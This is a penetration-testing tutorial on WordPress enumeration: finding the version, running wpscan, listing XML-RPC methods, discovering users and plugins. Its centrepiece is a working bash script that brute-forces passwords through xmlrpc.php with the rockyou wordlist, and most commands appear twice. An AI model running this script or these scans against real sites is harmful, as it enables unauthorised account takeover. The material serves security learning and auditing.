CSM enumeration: WordPress

- Easy and quick: Validate the WordPress version.

• If you notice that is running an old version is highly probable that you will find a vulnerability, maybe a simple vuln or maybe a critical; it will be your mission to find out.
• You can use the exploitDB or searchsploit to find vulerabilities of the WordPress version you are auditing.

Example For Users enumeration vulns:

searchsploit wordpress user enumeration

searchsploit wordpress user enumeration

Perform a full analysis using enumierations tools like wpscan, WPSeku or wordpresscan.

These tools, will scan and show you a full report of what is found, things like version, installed plugins, the potential found vulns, etc.

wpscan --url http://127.0.0.1:31337

wpscan --url http://127.0.0.1:31337

You can use this additional parameter that includes in the report, the found users and vulnerable plugins:

wpscan --url http://127.0.0.1:31337 -e vp,u

wpscan --url http://127.0.0.1:31337 -e vp,u

With this, the tool will try Brute Forcing.

Finally, wpscan could give you vulnerabilities not only based on plugins, will also report you vulnerabilities found at the WP version level.

But for this, you will need to use an API token that you can only get login in the WordPress online page. (if you are pentesting maybe this won't be useful until you get valid credentials).

For Password Enumeration:

In the web, you can validate if the /xmlrpc.php path is accessible:

/xmlrpc.php

/xmlrpc.php

This path commonly will sahre you a message saying "XML-RPC server accespts POST requests only".

So, we can send a POST request including a XML payload to try find valid credentials.

Here an interesting GitHub project where is documented this type of exploit.

GitHub - kh4sh3i/xmlrpc-exploit: Exploiting the xmlrpc.php on all WordPress versions Exploiting the xmlrpc.php on all WordPress versions - kh4sh3i/xmlrpc-exploit

The first thing to try with XMLRPC is list the existing methods:

So, save the xml payload shared in the github repository in a local file and, send it through a POST request to the /xmlrpc.php path.

This will report you the available methods.

Here specifies your xml file -> -d@file.xml

curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml

curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml

This will deplay all the available methods; one higily interesting is the wp.getUsersBlogs.

This method will help us to perform an Brute Force attack through the xmlrpc file.

For this, it will be necessary to write a bash script where you use this XML method to Brute Force the correct password.

Here a bash script example:

#!/bin/bash

function createXML(){
  password=$1
  xmlFile="""
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>USERNAME</value></param>
<param><value>$password</value></param>
</params>
</methodCall>"""
  echo $xmlFile > file.xml
  response=$$(curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml)
  if [ ! "$(echo $response | grep 'Incorrect username or password.')" ]; then
    echo -e "\n[+] La password es $password"
    exit 0
  fi
}

cat /usr/share/wordlists/rockyou.txt | while read password; do
  createXML $password
done

#!/bin/bash

function createXML(){
  password=$1
  xmlFile="""
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>USERNAME</value></param>
<param><value>$password</value></param>
</params>
</methodCall>"""
  echo $xmlFile > file.xml
  response=$$(curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml)
  if [ ! "$(echo $response | grep 'Incorrect username or password.')" ]; then
    echo -e "\n[+] La password es $password"
    exit 0
  fi
}

cat /usr/share/wordlists/rockyou.txt | while read password; do
  createXML $password
done

2. Are the login panels exposed and accessibles???

You can try access to one of the nexts paths:

/wp-login.php
/wp-admin.php

/wp-login.php
/wp-admin.php

• If you can access to one of this paths, you have found the gate to the system, you can try Brute Force or find another vulnerability to can obtain valid credentials.

Brute Force:

• You can use these panels to list existing users. This because if you try login using a non-existing user, the panel will show you that "the user is unknown". But, if you try an existing user the panel will show you "The password you entered for the username 'admin' is incorrect".
• Non-existing user: the user is unknown.
• Existing user: The password you entered for the username 'admin' is incorrect.

You can obtain potential valid users visiting the main page, where you will find the published articles. Each article have the authors name that is common to match with valid usernames. So, before perform any Brute Force attack, try to get valid usernames so save time and error logs (less noise).

3. Try to identify which plugins are installed, here you could find more vulnerabilities!

The interesting thing here is that maybe WordPress could be installed with the latest version but running vulnerable plugins, so it worth to check both ;)

Listing installed plugins:

• Try accessing the next internal-documentation path:

/wp-content/plugins/

/wp-content/plugins/

• Checking the code using curl:

curl -s -X GET "http://127.0.0.1/" | grep plugins

curl -s -X GET "http://127.0.0.1/" | grep plugins

In the output you could find the paths of the installed plugins including the plugin name.

Or more advanced, filtering by only the lines where the path is reported, removing the not useful data and reporting only unique values:

curl -s -X GET "http://127.0.0.1/" | grep -oP 'plugins/\K[^/]+' | sort -u

curl -s -X GET "http://127.0.0.1/" | grep -oP 'plugins/\K[^/]+' | sort -u